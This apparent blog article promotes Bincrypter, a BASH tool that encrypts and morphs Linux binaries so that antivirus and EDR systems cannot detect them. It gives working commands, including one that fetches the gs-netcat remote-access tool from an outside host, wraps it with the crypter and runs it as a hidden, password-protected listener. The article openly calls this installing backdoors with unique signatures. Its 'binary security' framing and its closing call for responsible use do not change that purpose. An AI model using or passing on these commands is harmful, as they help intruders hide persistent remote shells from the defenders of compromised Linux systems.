Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation

Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to obfuscate and encrypt ELF binaries and #!-scripts, providing a robust layer of protection against reverse engineering and detection by antivirus and endpoint detection and response (EDR) systems.

Key Features Of Bincrypter

• Obfuscation and Encryption: Bincrypter can encrypt and obfuscate any ELF binary or #!-script, making it difficult for attackers to reverse-engineer the code. The resulting binary is heavily obfuscated, with strings appearing as garbage, which complicates analysis.
• AV/EDR Evasion: The tool employs morphing techniques to change the binary’s signature every time it is executed. This makes it challenging for AV/EDR systems to detect the binary as malicious, as its signature is always different.
• In-Memory Operation: Bincrypter operates entirely in memory without creating temporary files. This ensures that the filesystem remains clean and reduces the risk of leaving behind evidence of its use.
• Multi-Layer Encryption: It supports double or triple encryption of the same binary, further enhancing its security features. This allows for multiple layers of protection against unauthorized access.
• Architecture Agnostic: Bincrypter is compatible with various architectures, including x86_64, aarch64, arm6, and mips. This versatility makes it suitable for use across different platforms.
• Living Off the Land (LOTL): The tool relies only on standard system tools like /bin/sh, perl, and openssl, which are typically available on most Linux systems. This approach minimizes dependencies and makes it easier to deploy in various environments.

To use Bincrypter, you can download the script from GitHub and execute it with the binary you want to encrypt. Here’s an example:

bash# Download the script
curl -SsfL https://github.com/hackerschoice/bincrypter/raw/refs/heads/main/bincrypter.sh -o bincrypter.sh
chmod +x bincrypter.sh

# Encrypt the 'id' binary
cp /usr/bin/id id
./bincrypter.sh id

# Optionally, set a custom password
cp /usr/bin/id id
./bincrypter.sh id foobar

Bincrypter can be used in scenarios where maintaining the integrity and confidentiality of binaries is crucial. For instance, it can be used to install backdoors with unique signatures, making them harder to detect:

bashcurl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter.sh >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc

Bincrypter is a versatile tool for protecting Linux binaries from reverse engineering and detection.

Its ability to operate in memory, support multiple encryption layers, and evade AV/EDR systems makes it a valuable asset in maintaining binary security.

However, like any powerful tool, it should be used responsibly and ethically.